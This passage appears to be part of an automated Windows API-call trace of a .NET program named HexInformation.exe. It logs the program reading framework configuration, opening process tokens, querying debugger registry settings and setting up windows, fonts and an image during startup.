lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x11fe3e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0142.026] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x11fe98c | out: lpFileInformation=0x11fe98c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0142.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x11fe380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0142.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x11fe8c4) returned 1 [0142.029] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xf0 [0142.030] GetFileType (hFile=0xf0) returned 0x1 [0142.030] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x11fe8c0) returned 1 [0142.030] GetFileType (hFile=0xf0) returned 0x1 [0142.271] GetFileSize (in: hFile=0xf0, lpFileSizeHigh=0x11fe980 | out: lpFileSizeHigh=0x11fe980*=0x0) returned 0x8c8f [0142.272] ReadFile (in: hFile=0xf0, lpBuffer=0x32a918c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x11fe93c, lpOverlapped=0x0 | out: lpBuffer=0x32a918c*, lpNumberOfBytesRead=0x11fe93c*=0x1000, lpOverlapped=0x0) returned 1 [0142.438] ReadFile (in: hFile=0xf0, lpBuffer=0x32a918c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x11fe7e8, lpOverlapped=0x0 | out: lpBuffer=0x32a918c*, lpNumberOfBytesRead=0x11fe7e8*=0x1000, lpOverlapped=0x0) returned 1 [0142.440] ReadFile (in: hFile=0xf0, lpBuffer=0x32a918c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x11fe69c, lpOverlapped=0x0 | out: lpBuffer=0x32a918c*, lpNumberOfBytesRead=0x11fe69c*=0x1000, lpOverlapped=0x0) returned 1 [0142.441] ReadFile (in: hFile=0xf0, lpBuffer=0x32a918c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x11fe69c, lpOverlapped=0x0 | out: lpBuffer=0x32a918c*, lpNumberOfBytesRead=0x11fe69c*=0x1000, lpOverlapped=0x0) returned 1 [0142.442] ReadFile (in: hFile=0xf0, lpBuffer=0x32a918c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x11fe69c, lpOverlapped=0x0 | out: lpBuffer=0x32a918c*, lpNumberOfBytesRead=0x11fe69c*=0x1000, lpOverlapped=0x0) returned 1 [0142.442] ReadFile (in: hFile=0xf0, lpBuffer=0x32a918c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x11fe5d4, lpOverlapped=0x0 | out: lpBuffer=0x32a918c*, lpNumberOfBytesRead=0x11fe5d4*=0x1000, lpOverlapped=0x0) returned 1 [0142.449] ReadFile (in: hFile=0xf0, lpBuffer=0x32a918c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x11fe758, lpOverlapped=0x0 | out: lpBuffer=0x32a918c*, lpNumberOfBytesRead=0x11fe758*=0x1000, lpOverlapped=0x0) returned 1 [0142.452] ReadFile (in: hFile=0xf0, lpBuffer=0x32a918c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x11fe664, lpOverlapped=0x0 | out: lpBuffer=0x32a918c*, lpNumberOfBytesRead=0x11fe664*=0x1000, lpOverlapped=0x0) returned 1 [0142.452] ReadFile (in: hFile=0xf0, lpBuffer=0x32a918c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x11fe664, lpOverlapped=0x0 | out: lpBuffer=0x32a918c*, lpNumberOfBytesRead=0x11fe664*=0xc8f, lpOverlapped=0x0) returned 1 [0142.452] ReadFile (in: hFile=0xf0, lpBuffer=0x32a918c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x11fe728, lpOverlapped=0x0 | out: lpBuffer=0x32a918c*, lpNumberOfBytesRead=0x11fe728*=0x0, lpOverlapped=0x0) returned 1 [0142.453] CloseHandle (hObject=0xf0) returned 1 [0142.455] GetCurrentProcess () returned 0xffffffff [0142.455] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x11fead4 | out: TokenHandle=0x11fead4*=0xf0) returned 1 [0142.456] GetCurrentProcess () returned 0xffffffff [0142.456] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x11fead4 | out: TokenHandle=0x11fead4*=0x2d0) returned 1 [0142.457] GetCurrentProcess () returned 0xffffffff [0142.457] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x11fe98c | out: TokenHandle=0x11fe98c*=0x2d4) returned 1 [0142.457] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexInformation.exe.config" (normalized: "c:\\users\\fd1hvy\\desktop\\hexinformation.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x11fe984 | out: lpFileInformation=0x11fe984*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0142.457] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexInformation.exe.config", nBufferLength=0x105, lpBuffer=0x11fe3e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HexInformation.exe.config", lpFilePart=0x0) returned 0x31 [0142.458] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexInformation.exe.config" (normalized: "c:\\users\\fd1hvy\\desktop\\hexinformation.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x11fe98c | out: lpFileInformation=0x11fe98c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0142.459] GetCurrentProcess () returned 0xffffffff [0142.459] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x11fead4 | out: TokenHandle=0x11fead4*=0x2d8) returned 1 [0142.460] GetCurrentProcess () returned 0xffffffff [0142.460] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x11fead4 | out: TokenHandle=0x11fead4*=0x2dc) returned 1 [0142.557] GetCurrentProcess () returned 0xffffffff [0142.557] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x11fe934 | out: TokenHandle=0x11fe934*=0x2e0) returned 1 [0142.564] GetCurrentProcess () returned 0xffffffff [0142.564] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x11fe944 | out: TokenHandle=0x11fe944*=0x2e4) returned 1 [0142.668] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0142.673] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x735f0000 [0144.493] AdjustWindowRectEx (in: lpRect=0x11fed64, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x11fed64) returned 1 [0144.500] GetCurrentProcess () returned 0xffffffff [0144.500] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x11fec78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x11fec78*=0x2ec) returned 1 [0144.519] GetCurrentActCtx (in: lphActCtx=0x11febd8 | out: lphActCtx=0x11febd8*=0x0) returned 1 [0144.521] ActivateActCtx (in: hActCtx=0x153972c, lpCookie=0x11febe8 | out: hActCtx=0x153972c, lpCookie=0x11febe8) returned 1 [0144.522] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0144.531] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x740d0000 [0144.704] GetModuleHandleW (lpModuleName="user32.dll") returned 0x750c0000 [0144.704] GetProcAddress (hModule=0x750c0000, lpProcName="DefWindowProcW") returned 0x743c0140 [0144.706] GetStockObject (i=5) returned 0x900015 [0144.712] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0144.716] CoTaskMemAlloc (cb=0x5a) returned 0x1544678 [0144.716] RegisterClassW (lpWndClass=0x11fea8c) returned 0xc1b0 [0144.717] CoTaskMemFree (pv=0x1544678) [0144.717] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0144.718] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r9_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0xe70000, lpParam=0x0) returned 0x602b8 [0144.721] SetWindowLongW (hWnd=0x602b8, nIndex=-4, dwNewLong=1950089536) returned 93259198 [0144.722] GetWindowLongW (hWnd=0x602b8, nIndex=-4) returned 1950089536 [0144.727] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x11fe2a8 | out: phkResult=0x11fe2a8*=0x300) returned 0x0 [0144.839] RegQueryValueExW (in: hKey=0x300, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x11fe2c8, lpData=0x0, lpcbData=0x11fe2c4*=0x0 | out: lpType=0x11fe2c8*=0x0, lpData=0x0, lpcbData=0x11fe2c4*=0x0) returned 0x2 [0144.839] RegQueryValueExW (in: hKey=0x300, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x11fe2c8, lpData=0x0, lpcbData=0x11fe2c4*=0x0 | out: lpType=0x11fe2c8*=0x0, lpData=0x0, lpcbData=0x11fe2c4*=0x0) returned 0x2 [0144.839] RegCloseKey (hKey=0x300) returned 0x0 [0144.840] SetWindowLongW (hWnd=0x602b8, nIndex=-4, dwNewLong=93259238) returned 1950089536 [0144.889] GetWindowLongW (hWnd=0x602b8, nIndex=-4) returned 93259238 [0144.889] GetWindowLongW (hWnd=0x602b8, nIndex=-16) returned 113311744 [0144.890] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc1b1 [0144.891] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc1b2 [0144.891] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x602b8, Msg=0x81, wParam=0x0, lParam=0x11fe5f8) returned 0x1 [0144.893] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x602b8, Msg=0x83, wParam=0x0, lParam=0x11fe5e4) returned 0x0 [0144.900] CallWindowProcW (lpPrevWndFunc=0x743c0140, hWnd=0x602b8, Msg=0x1, wParam=0x0, lParam=0x11fe5f8) returned 0x0 [0144.900] GetClientRect (in: hWnd=0x602b8, lpRect=0x11fe2e0 | out: lpRect=0x11fe2e0) returned 1 [0144.901] GetWindowRect (in: hWnd=0x602b8, lpRect=0x11fe2e0 | out: lpRect=0x11fe2e0) returned 1 [0144.903] GetParent (hWnd=0x602b8) returned 0x0 [0144.903] DeactivateActCtx (dwFlags=0x0, ulCookie=0x14210001) returned 1 [0145.481] EtwEventRegister (in: ProviderId=0x32c56d0, EnableCallback=0x58f060e, CallbackContext=0x0, RegHandle=0x32c56ac | out: RegHandle=0x32c56ac) returned 0x0 [0145.490] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0145.491] AdjustWindowRectEx (in: lpRect=0x11feaec, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11feaec) returned 1 [0145.491] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0145.491] AdjustWindowRectEx (in: lpRect=0x11feaec, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11feaec) returned 1 [0145.491] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0145.491] AdjustWindowRectEx (in: lpRect=0x11feaec, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11feaec) returned 1 [0145.493] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0145.493] AdjustWindowRectEx (in: lpRect=0x11feae8, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11feae8) returned 1 [0145.494] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0145.494] AdjustWindowRectEx (in: lpRect=0x11feaec, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11feaec) returned 1 [0145.503] GetSystemDefaultLCID () returned 0x409 [0145.503] GetStockObject (i=17) returned 0xa01c1 [0145.505] GetObjectW (in: h=0xa01c1, c=92, pv=0x11fe8a8 | out: pv=0x11fe8a8) returned 92 [0145.506] GetDC (hWnd=0x0) returned 0x60100ce [0146.269] GdiplusStartup (in: token=0x14c5ee8, input=0x11fde60, output=0x11fdeb0 | out: token=0x14c5ee8, output=0x11fdeb0) returned 0x0 [0146.413] CoTaskMemAlloc (cb=0x5c) returned 0x1544a20 [0146.418] GdipCreateFontFromLogfontW (hdc=0x60100ce, logfont=0x1544a20, font=0x11fe970) returned 0x0 [0148.852] CoTaskMemFree (pv=0x1544a20) [0148.853] CoTaskMemAlloc (cb=0x5c) returned 0x1544a88 [0148.853] CoTaskMemFree (pv=0x1544a88) [0148.854] CoTaskMemAlloc (cb=0x5c) returned 0x1544c28 [0148.854] CoTaskMemFree (pv=0x1544c28) [0148.856] GdipGetFontUnit (font=0x58e1f08, unit=0x11fe938) returned 0x0 [0148.856] GdipGetFontSize (font=0x58e1f08, size=0x11fe93c) returned 0x0 [0148.856] GdipGetFontStyle (font=0x58e1f08, style=0x11fe934) returned 0x0 [0148.857] GdipGetFamily (font=0x58e1f08, family=0x11fe930) returned 0x0 [0148.858] GdipGetFontSize (font=0x58e1f08, size=0x32c67b8) returned 0x0 [0148.858] ReleaseDC (hWnd=0x0, hDC=0x60100ce) returned 1 [0148.858] GetDC (hWnd=0x0) returned 0x60100ce [0148.859] GdipCreateFromHDC (hdc=0x60100ce, graphics=0x11fe94c) returned 0x0 [0148.868] GdipGetDpiY (graphics=0x6e0f260, dpi=0x32c6894) returned 0x0 [0148.869] GdipGetFontHeight (font=0x58e1f08, graphics=0x6e0f260, height=0x11fe944) returned 0x0 [0148.869] GdipGetEmHeight (family=0x58e8170, style=0, EmHeight=0x11fe94c) returned 0x0 [0148.869] GdipGetLineSpacing (family=0x58e8170, style=0, LineSpacing=0x11fe94c) returned 0x0 [0148.870] GdipDeleteGraphics (graphics=0x6e0f260) returned 0x0 [0148.870] ReleaseDC (hWnd=0x0, hDC=0x60100ce) returned 1 [0148.953] GdipCreateFont (fontFamily=0x58e8170, emSize=0x41040000, style=0, unit=0x3, font=0x32c68b0) returned 0x0 [0148.953] GdipGetFontSize (font=0x58eef48, size=0x32c68b4) returned 0x0 [0148.954] GdipDeleteFont (font=0x58e1f08) returned 0x0 [0148.954] GetDC (hWnd=0x0) returned 0x60100ce [0148.954] GdipCreateFromHDC (hdc=0x60100ce, graphics=0x11fe9c0) returned 0x0 [0148.955] GdipGetFontHeight (font=0x58eef48, graphics=0x6e0f260, height=0x11fe9b8) returned 0x0 [0148.955] GdipDeleteGraphics (graphics=0x6e0f260) returned 0x0 [0148.955] ReleaseDC (hWnd=0x0, hDC=0x60100ce) returned 1 [0148.957] GetSystemMetrics (nIndex=5) returned 1 [0148.957] GetSystemMetrics (nIndex=6) returned 1 [0148.958] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0148.959] AdjustWindowRectEx (in: lpRect=0x11feae8, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x11feae8) returned 1 [0148.960] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0148.960] AdjustWindowRectEx (in: lpRect=0x11feaec, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11feaec) returned 1 [0148.962] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0148.962] AdjustWindowRectEx (in: lpRect=0x11feaf0, dwStyle=0x56010000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11feaf0) returned 1 [0148.962] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0148.962] AdjustWindowRectEx (in: lpRect=0x11feaf0, dwStyle=0x56010000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11feaf0) returned 1 [0148.963] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0148.963] AdjustWindowRectEx (in: lpRect=0x11feaf0, dwStyle=0x56010000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11feaf0) returned 1 [0148.963] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0148.963] AdjustWindowRectEx (in: lpRect=0x11feaf0, dwStyle=0x56010000, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11feaf0) returned 1 [0149.042] GdipCreateFontFamilyFromName (name="Open Sans", fontCollection=0x0, fontFamily=0x11feac8) returned 0xe [0149.050] GdipGetGenericFontFamilySansSerif (nativeFamily=0x11feab4) returned 0x0 [0149.050] GdipCreateFont (fontFamily=0x11111111, emSize=0x41900000, style=0, unit=0x3, font=0x32c730c) returned 0x0 [0149.051] GdipGetFontSize (font=0x58e1f08, size=0x32c7310) returned 0x0 [0149.056] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0149.056] AdjustWindowRectEx (in: lpRect=0x11fea4c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fea4c) returned 1 [0149.213] GetUserObjectInformationA (in: hObj=0x148, nIndex=1, pvInfo=0x32c7a2c, nLength=0xc, lpnLengthNeeded=0x11fe928 | out: pvInfo=0x32c7a2c, lpnLengthNeeded=0x11fe928) returned 1 [0149.217] SetConsoleCtrlHandler (HandlerRoutine=0x58f0636, Add=1) returned 1 [0149.218] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0149.219] GetModuleHandleW (lpModuleName=0x0) returned 0xe70000 [0149.221] GetClassInfoW (in: hInstance=0xe70000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWndClass=0x32c7a90 | out: lpWndClass=0x32c7a90) returned 0 [0149.224] CoTaskMemAlloc (cb=0x58) returned 0x153dd90 [0149.224] RegisterClassW (lpWndClass=0x11fe878) returned 0xc1b4 [0149.225] CoTaskMemFree (pv=0x153dd90) [0149.226] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xe70000, lpParam=0x0) returned 0x202c6 [0149.235] NtdllDefWindowProc_W (hWnd=0x202c6, Msg=0x83, wParam=0x0, lParam=0x11fe3a4) returned 0x0 [0149.235] NtdllDefWindowProc_W (hWnd=0x202c6, Msg=0x1, wParam=0x0, lParam=0x11fe3b8) returned 0x0 [0149.236] NtdllDefWindowProc_W (hWnd=0x202c6, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0149.236] NtdllDefWindowProc_W (hWnd=0x202c6, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0149.243] GetSysColor (nIndex=10) returned 0xb4b4b4 [0149.243] GetSysColor (nIndex=2) returned 0xd1b499 [0149.243] GetSysColor (nIndex=9) returned 0x0 [0149.243] GetSysColor (nIndex=12) returned 0xababab [0149.243] GetSysColor (nIndex=15) returned 0xf0f0f0 [0149.243] GetSysColor (nIndex=20) returned 0xffffff [0149.243] GetSysColor (nIndex=16) returned 0xa0a0a0 [0149.243] GetSysColor (nIndex=15) returned 0xf0f0f0 [0149.243] GetSysColor (nIndex=16) returned 0xa0a0a0 [0149.243] GetSysColor (nIndex=21) returned 0x696969 [0149.243] GetSysColor (nIndex=22) returned 0xe3e3e3 [0149.243] GetSysColor (nIndex=20) returned 0xffffff [0149.243] GetSysColor (nIndex=18) returned 0x0 [0149.244] GetSysColor (nIndex=1) returned 0x0 [0149.244] GetSysColor (nIndex=27) returned 0xead1b9 [0149.244] GetSysColor (nIndex=28) returned 0xf2e4d7 [0149.244] GetSysColor (nIndex=17) returned 0x6d6d6d [0149.244] GetSysColor (nIndex=13) returned 0xd77800 [0149.244] GetSysColor (nIndex=14) returned 0xffffff [0149.244] GetSysColor (nIndex=26) returned 0xcc6600 [0149.244] GetSysColor (nIndex=11) returned 0xfcf7f4 [0149.244] GetSysColor (nIndex=3) returned 0xdbcdbf [0149.244] GetSysColor (nIndex=19) returned 0x0 [0149.244] GetSysColor (nIndex=24) returned 0xe1ffff [0149.244] GetSysColor (nIndex=23) returned 0x0 [0149.244] GetSysColor (nIndex=4) returned 0xf0f0f0 [0149.244] GetSysColor (nIndex=30) returned 0xf0f0f0 [0149.244] GetSysColor (nIndex=29) returned 0xd77800 [0149.244] GetSysColor (nIndex=7) returned 0x0 [0149.244] GetSysColor (nIndex=0) returned 0xc8c8c8 [0149.244] GetSysColor (nIndex=5) returned 0xffffff [0149.244] GetSysColor (nIndex=6) returned 0x646464 [0149.245] GetSysColor (nIndex=8) returned 0x0 [0149.245] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0149.245] AdjustWindowRectEx (in: lpRect=0x11fea4c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fea4c) returned 1 [0149.247] GdipCreateFontFamilyFromName (name="Open Sans", fontCollection=0x0, fontFamily=0x11feac8) returned 0xe [0149.247] GdipGetGenericFontFamilySansSerif (nativeFamily=0x11feab4) returned 0x0 [0149.248] GdipCreateFont (fontFamily=0x11111111, emSize=0x41640000, style=0, unit=0x3, font=0x32c7fdc) returned 0x0 [0149.248] GdipGetFontSize (font=0x6e0abd0, size=0x32c7fe0) returned 0x0 [0149.248] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0149.249] AdjustWindowRectEx (in: lpRect=0x11fea4c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fea4c) returned 1 [0149.249] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0149.249] AdjustWindowRectEx (in: lpRect=0x11fea4c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fea4c) returned 1 [0149.249] GdipCreateFontFamilyFromName (name="Open Sans", fontCollection=0x0, fontFamily=0x11feac8) returned 0xe [0149.249] GdipGetGenericFontFamilySansSerif (nativeFamily=0x11feab4) returned 0x0 [0149.250] GdipCreateFont (fontFamily=0x11111111, emSize=0x411c0000, style=0, unit=0x3, font=0x32c8188) returned 0x0 [0149.250] GdipGetFontSize (font=0x6e0abf8, size=0x32c818c) returned 0x0 [0149.250] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0149.250] AdjustWindowRectEx (in: lpRect=0x11fea4c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fea4c) returned 1 [0149.250] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0149.250] AdjustWindowRectEx (in: lpRect=0x11fea4c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fea4c) returned 1 [0149.251] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0149.251] AdjustWindowRectEx (in: lpRect=0x11fea78, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fea78) returned 1 [0149.252] GdipCreateFontFamilyFromName (name="Open Sans", fontCollection=0x0, fontFamily=0x11feac8) returned 0xe [0149.252] GdipGetGenericFontFamilySansSerif (nativeFamily=0x11feab4) returned 0x0 [0149.252] GdipCreateFont (fontFamily=0x11111111, emSize=0x41340000, style=0, unit=0x3, font=0x32c8468) returned 0x0 [0149.252] GdipGetFontSize (font=0x6e0ac20, size=0x32c846c) returned 0x0 [0149.253] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0149.253] AdjustWindowRectEx (in: lpRect=0x11fea4c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fea4c) returned 1 [0149.253] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0149.253] AdjustWindowRectEx (in: lpRect=0x11fea4c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fea4c) returned 1 [0149.253] GetSystemMetrics (nIndex=5) returned 1 [0149.253] GetSystemMetrics (nIndex=6) returned 1 [0149.254] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0149.254] AdjustWindowRectEx (in: lpRect=0x11fea4c, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x11fea4c) returned 1 [0149.254] GetSystemMetrics (nIndex=5) returned 1 [0149.254] GetSystemMetrics (nIndex=6) returned 1 [0149.254] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0149.254] AdjustWindowRectEx (in: lpRect=0x11fea4c, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x11fea4c) returned 1 [0149.256] GdipCreateFontFamilyFromName (name="Open Sans", fontCollection=0x0, fontFamily=0x11feac8) returned 0xe [0149.256] GdipGetGenericFontFamilySansSerif (nativeFamily=0x11feab4) returned 0x0 [0149.256] GdipCreateFont (fontFamily=0x11111111, emSize=0x41340000, style=0, unit=0x3, font=0x32c86e4) returned 0x0 [0149.256] GdipGetFontSize (font=0x6e0ac48, size=0x32c86e8) returned 0x0 [0149.257] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0149.257] AdjustWindowRectEx (in: lpRect=0x11fea4c, dwStyle=0x5e00000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fea4c) returned 1 [0149.257] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0149.257] AdjustWindowRectEx (in: lpRect=0x11fea4c, dwStyle=0x5e00000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x11fea4c) returned 1 [0149.449] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexInformation.exe.config", nBufferLength=0x105, lpBuffer=0x11fe364, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HexInformation.exe.config", lpFilePart=0x0) returned 0x31 [0149.449] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x11fe820) returned 1 [0149.449] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexInformation.exe.config" (normalized: "c:\\users\\fd1hvy\\desktop\\hexinformation.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x11fe89c | out: lpFileInformation=0x11fe89c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0149.450] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x11fe81c) returned 1 [0155.555] GdipLoadImageFromStream (stream=0x3260030, image=0x11fe500) returned 0x0 [0156.259] GdipImageForceValidation (image=0x6e0f260) returned 0x0 [0156.262] GdipGetImageType (image=0x6e0f260, type=0x11fe4fc) returned 0x0 [0156.263] GdipGetImageRawFormat (image=0x6e0f260, format=0x11fe470*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0156.286] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x735f0000 [0156.287] AdjustWindowRectEx (in: lpRect=0x11fea78, dwStyle=0x56000000, bMenu=0, 